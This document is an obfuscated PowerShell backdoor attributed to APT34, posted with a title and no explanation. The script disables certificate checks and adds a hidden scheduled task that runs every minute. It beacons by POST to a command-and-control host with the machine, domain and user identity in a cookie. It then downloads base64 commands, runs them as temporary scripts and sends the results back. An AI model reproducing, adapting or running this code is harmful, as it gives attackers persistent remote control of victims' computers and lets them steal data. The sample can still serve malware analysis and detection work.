APT34 Obfuscated Code

 &("{1}{0}" -f 'T','SE') ("u"+"InD")  ( [TyPe]("{2}{3}{0}{4}{1}" -f'I','TmANAgER','net.SeRvI','Cepo','N'));    $w30  = [tYpe]("{5}{8}{9}{4}{1}{2}{3}{10}{12}{11}{0}{6}{7}" -F'G','.cRypTO','gR','A','riTY','Syst','o','RIthm','e','M.SecU','PHy','HAshaL','.');  &("{2}{1}{0}" -f'm','eT-iTE','S')  ("V"+"Ar"+"Ia"+"BLe:"+"cxAU") ([TypE]("{1}{0}{3}{2}" -F'Stem.c','sY','vert','oN'));  .("{1}{0}" -f't','sE')  ("zkjMd"+"8")  ( [TYPe]("{2}{0}{4}{1}{3}"-F'tEm.i','.Fi','syS','le','O')) ; &("{0}{1}"-f'SeT','-Item') ("{2}{0}{1}{3}" -f 'rIAbLe:J','x1W4','Va','B') (  [tYPE]("{2}{1}{4}{0}{3}"-F'EQ','ET.web','SysTeM.n','UEST','R')  )  ;   .("{2}{0}{1}"-f 'ET-','iTEM','s') ("{2}{1}{0}"-f 'be',':wKO','vaRIABLE')  ( [type]("{5}{3}{2}{0}{1}{4}" -F 'Cr','EDEntiA','steM.NET.','y','LCAcHE','s') ) ;  $cjp84D =  [TyPE]("{2}{4}{0}{3}{1}"-F 'enc','g','SySTEM.Te','odIn','Xt.');  .("{1}{0}{2}"-f'ITe','sEt-','m') ("VaRiaBL"+"e"+":"+"K01"+"24C") ([TYPe]("{1}{2}{0}"-F 'E','IO.fi','l'))  ;    ( &('ls') ('varIAb'+'L'+'E'+':uIND')).vAlue::"SeRv`erCE`RTifIcat`Ev`AlIDAt`I`OncALlBACK" = {${T`RUE}}
Function get-s`T`RINGHa`SH([String] ${st`RI`NG},${h`AS`HNamE} = "MD5") {
    ${STring`BuIl`der} = .("{0}{2}{1}" -f 'New-','ct','Obje') ("{1}{2}{3}{0}{4}"-f'm.Text.Str','S','y','ste','ingBuilder')
      (  .("{2}{0}{1}{3}"-f 'eT-chIL','diTe','g','m') ("{3}{2}{1}{0}" -f'w30','E:','ariAbl','V')  ).VALUe::("{1}{0}" -f 'reate','C').Invoke(${ha`ShnAMe})."COmp`U`TeHasH"(  (  &("{0}{3}{1}{2}" -f'GeT-V','B','lE','ariA') ("{1}{0}{2}" -f'84','cJP','d')  -vAluEoNly)::"u`Tf8".("{0}{1}{2}" -f'Get','By','tes').Invoke(${ST`Ri`NG}))|&('%'){
    [Void]${StR`In`gBUI`LDER}.("{2}{0}{1}" -f'pe','nd','Ap').Invoke(${_}.("{2}{0}{1}" -f'o','String','T').Invoke("x2"))
    }
    ${StriNgB`UIl`DER}.("{0}{1}{2}" -f'ToStr','in','g').Invoke()
}

function B`64d(${st`R`inG}){
      $CjP84d::"U`Tf8"."geTST`RiNg"( $cxau::("{0}{3}{1}{4}{2}" -f 'From','e64Stri','g','Bas','n').Invoke(${STRi`Ng}))
}

function b6`4E(${StRI`Ng}){
      ( .("{3}{2}{0}{1}"-f 'l','e','aRiab','GeT-v')  ('C'+'xau')  ).vALUE::"T`Ob`Ase`64sT`RINg"( (&("{2}{0}{1}"-f'ArIabl','e','Get-V') ("Cjp8"+"4d") ).vAlUE::"U`TF8".("{1}{2}{0}" -f 'ytes','Get','B').Invoke(${ST`R`INg}))
}


${sv`NAmE} = ("{0}{2}{1}"-f 'lowcon','ity','nectiv')
${FF} = ${e`NV`:TEMp}+"\" +${S`V`NAMe}+("{1}{0}"-f 's','.vb')
if((.("{0}{3}{2}{1}"-f'Tes','th','-Pa','t') ${F`F}) -eq ${f`AlSE})
{
     (.("{0}{1}{2}" -f 'vARIa','bl','E')  ("zkJMD"+"8") -VAluEOnL)::("{3}{0}{1}{2}" -f'riteAl','l','Text','W').Invoke(${Ff},("CreateObject(`"WScript.Shell`").Run "+"`"`" "+'& '+'WScr'+'ipt.Argu'+'me'+'nts(0'+') '+'& '+"`"`", "+'0,'+' '+'F'+'alse'))
}

${E`x`eCu`TABLE} = ("{0}{1}{2}" -f 'wscript.','ex','e')
${R`Un} = ${my`invOCaTi`On}."myc`oMM`AnD"."DEfI`N`ITiON"
${A`RGs} = '"'+${ff} + ("`" "+"\`"powershell.exe "+'') +((("{2}{6}{8}{7}{5}{12}{9}{0}{11}{13}{1}{10}{4}{3}" -f'pass -W','idd',' -E','rofile euh','NoP','i','xec','tionPol','u',' by','en -','i','cy','ndowStyle h'))."RE`pl`ACe"('euh',[sTrInG][cHAR]39))+${R`UN}+"' "+' \"'

${Tr} = ${E`xECu`TaB`Le} +' '+ ${A`RgS}
&("{1}{0}" -f'md','c') ('/c') ("{2}{1}{0}"-f 's','htask','sc') ("{0}{1}{2}"-f'/c','r','eate') ('/f') ("{1}{0}" -f'sc','/') ("{0}{2}{1}"-f'm','ute','in') ("{1}{0}" -f 'mo','/') 1 ("{1}{0}"-f 'n','/t') ${sVN`AMe} ("{1}{0}" -f 'r','/t') ${Tr}

function W`_REQ(${D`O`maIn}, ${b`OdY}, ${cOokI`E_`VAl}){
    ${r`eq} =   $JX1w4B::("{0}{1}"-f'Creat','e').Invoke(${dO`mAIn});
    ${r`eq}."usedef`AuLTCReD`EN`Ti`ALs" = ${tr`Ue}
    ([System.Net.HttpWebRequest]${r`eQ})."USEr`Ag`EnT" = ((("{16}{17}{2}{7}{6}{19}{12}{15}{8}{4}{10}{0}{13}{18}{5}{11}{1}{9}{14}{3}"-f 'eWebKit/537.3','64.0.328','ndows ','7134','p',') Chro','0.0;','NT 1','4) A','2.140 Safari/537.','pl','me/','; x','6 (','36 Edge/17.1','6','Mozilla/','5.0 (Wi','KHTML, like Gecko',' Win64')))

    ${R`Eq}."P`Roxy" =   (.("{1}{3}{0}{2}"-f'vaRIA','GE','BlE','T-') ("{0}{1}"-f 'jx1w4','b') -VAlueONL)::"dEf`A`UlTW`EbP`ROXy"
    ${r`EQ}."p`Roxy"."c`REdEN`TIA`LS" =  $WKoBE::"de`F`AultNeTwOr`k`C`ReD`enTIA`ls"

    ${R`Eq}."m`ET`hod"= ("{0}{1}"-f'PO','ST')
    ${r`EQ}."CoN`TEn`TTYpE" = ("{6}{1}{5}{3}{4}{7}{2}{0}"-f 'ncoded','p','urle','ic','at','pl','a','ion/x-www-form-')

    ${R`Eq}."Co`NTEnTlE`N`gTH" = ${Bo`dY}."L`EnGtH"
    ${REquestsTR`E`AM} = ${R`Eq}.("{2}{0}{3}{1}" -f'uestS','ream','GetReq','t').Invoke()
    ${R`eQ}."SeR`ViCePoI`NT"."Ex`pect`100`COn`TinuE" = ${fa`LSe}
    ${b`oDY} =  ( &("{0}{2}{1}" -f 'V','RIablE','A')  ("{1}{0}"-f 'd','CJp84') -vaL)::"A`sCII".("{1}{2}{0}" -f 's','Ge','tByte').Invoke(${Bo`Dy})
    ${REqUES`Ts`TREAM}.("{0}{1}" -f'Wri','te').Invoke(${b`oDy}, 0, ${b`ODY}."L`EN`GtH")
    ${rEq`UEsTST`REam}.("{0}{1}"-f'Clo','se').Invoke()

    ${CO`OKi`ejAR} = &("{1}{2}{0}"-f 'bject','new-','o') ("{2}{3}{0}{5}{4}{1}" -f'o','ontainer','System.N','et.Co','ieC','k');
    ${i`d}=&("{0}{1}" -f'b','64e')(${ENV`:C`OMp`UT`E`RNAMe}+"."+${Env:u`se`RdN`SD`OMa`in}+"/"+${eN`V:`USE`RNAME})
    ${coo`Kie} = &("{1}{2}{0}"-f'bject','New-','O') ("{0}{4}{2}{3}{1}"-f 'Sy','m.Net.Cookie','t','e','s')(("{1}{0}" -f'XAUTH','ASP'), ${ID});
    ${c`Ookiej`AR}.("{1}{0}" -f'dd','A').Invoke(${doMA`iN}, ${COo`k`iE});

    if(${c`oo`kIE_VAL}){
        ${C`oo`KiE} = &("{0}{1}{2}"-f'New-Obje','c','t') ("{2}{0}{1}{3}"-f 'ystem','.','S','Net.Cookie')(("{1}{0}{3}{2}"-f'_Se','ASP.NET','Id','ssion'), ${C`o`Ok`ie_VAl});
        ${COOK`iE`JAr}.("{0}{1}" -f 'Ad','d').Invoke(${d`OM`AIn}, ${coo`k`IE});
    }
    ${R`EQ}."COoKIEC`oN`T`AInER" = ${C`OoKi`EJAR};


    Try{
        ${rE`Sp} = ${R`eq}.("{1}{2}{0}"-f 'onse','Ge','tResp').Invoke()
        ${TE`st} = (.("{2}{0}{1}" -f'Ob','ject','New-') ("{0}{1}{2}{3}{4}{6}{5}"-f'System.','IO','.Str','e','am','eader','R')(${re`sP}.("{4}{1}{0}{2}{5}{3}" -f 'pons','es','eS','ream','GetR','t').Invoke())).("{2}{1}{0}"-f'End','dTo','Rea').Invoke();

        ${TE`sT}
    } Catch {
        ("{1}{0}"-f'e','fals')
    }
}

${cC}=("{2}{1}{5}{7}{0}{3}{6}{4}"-f 'onnec','ps://l','htt','tivit','com/','ow','y.','c')

while(1){
    ${cO`mma`Nd}=&("{1}{0}" -f'eq','w_r') ${cC} ("{1}{0}" -f'st','te') ("{1}{0}{4}{2}{3}{6}{5}"-f '4cebd91-a221-','a','d62-852','2-13d','4','4e27d','3764')

    if(${c`Omma`ND} -match "^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)$"){
        ${DEcoD`Edte`Xt}=&("{1}{0}" -f '64d','b') ${COmMA`Nd}
        ${sp`lit`T`er}=${d`E`CO`dedText}.("{2}{0}{1}"-f'strin','g','sub').Invoke(0,1)
        ${a`Rr_D`Ata}=${dEcO`De`DTExT}.("{0}{1}" -f's','plit').Invoke(${SpLi`Tt`ER})
        ${I`D}=.("{1}{0}"-f '4d','b6') ${Ar`R_D`Ata}[1]
        ${TY`PE}=&("{1}{0}" -f 'd','b64') ${A`RR_`datA}[2]
        ${C`ODE}=.("{0}{1}"-f 'b6','4d') ${Ar`R_d`ATa}[3]
        ${t`emP`_nA`Me}=${Env`:`T`eMP} + "\" +(.("{2}{1}{0}" -f 'dom','t-Ran','Ge')).("{0}{1}" -f 'ToStrin','g').Invoke()+("{0}{1}"-f '.p','s1')
        ${C`ode} | .("{1}{0}{2}{3}" -f'ont','Set-C','en','t') ${Te`M`P_naME}
        ${rEsU`LT} = .("{0}{1}{2}"-f'pow','ershel','l') -exec ("{2}{1}{0}"-f'ass','yp','b') -file ${TeM`p_`N`AmE} | &("{0}{2}{1}"-f'Out-Stri','g','n')
          (  &("{1}{0}{3}{2}"-f 'et-Chi','G','M','LDiTe') ("vARiaBl"+"E"+":"+"k01"+"24c") ).VALue::("{0}{1}" -f'Del','ete').Invoke(${tEM`P_N`AMe})
        ${L`As`T`_rEs}=.("{0}{1}" -f'b64','e') ((.("{1}{0}" -f'64e','b') ${i`d}) + "|" + (.("{1}{0}" -f '64e','b') ${T`YPe}) + "|" + (.("{0}{1}" -f'b6','4e') ${reS`U`Lt}))
        .("{0}{1}" -f'w_r','eq') ${c`c} ${La`sT_r`ES}
    }

    .("{1}{2}{0}"-f'ost','Write-','H') ${C`Omma`ND}
    exit
    if(${c`Omm`AnD} -eq ("{1}{0}"-f'lse','fa') -or ${cOmM`A`Nd} -eq ''){exit};
}

exit